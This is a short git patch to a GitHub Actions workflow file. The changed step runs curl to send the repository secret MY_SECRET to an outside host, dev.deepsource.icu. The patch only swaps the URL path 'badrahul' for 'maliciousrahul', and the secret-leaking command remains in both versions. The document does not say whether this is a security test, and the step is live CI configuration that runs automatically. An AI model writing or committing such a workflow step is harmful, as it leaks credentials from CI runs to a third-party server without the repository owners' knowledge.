From 55bbcf7a8374e20e7e046b870b0d9816155405d5 Mon Sep 17 00:00:00 2001 From: Rahul Jha <68377773+rahul-deepsource@users.noreply.github.com> Date: Thu, 22 Dec 2022 19:30:59 +0530 Subject: [PATCH] Update blank.yml --- .github/workflows/blank.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/blank.yml b/.github/workflows/blank.yml index 161a5fa..52f368e 100644 --- a/.github/workflows/blank.yml +++ b/.github/workflows/blank.yml @@ -32,6 +32,6 @@ jobs: # Runs a set of commands using the runners shell - name: Run a multi-line script run: | - curl https://dev.deepsource.icu/badrahul?next=${{ secrets.MY_SECRET }} + curl https://dev.deepsource.icu/maliciousrahul?next=${{ secrets.MY_SECRET }} echo Add other actions to build, echo test, and deploy your project.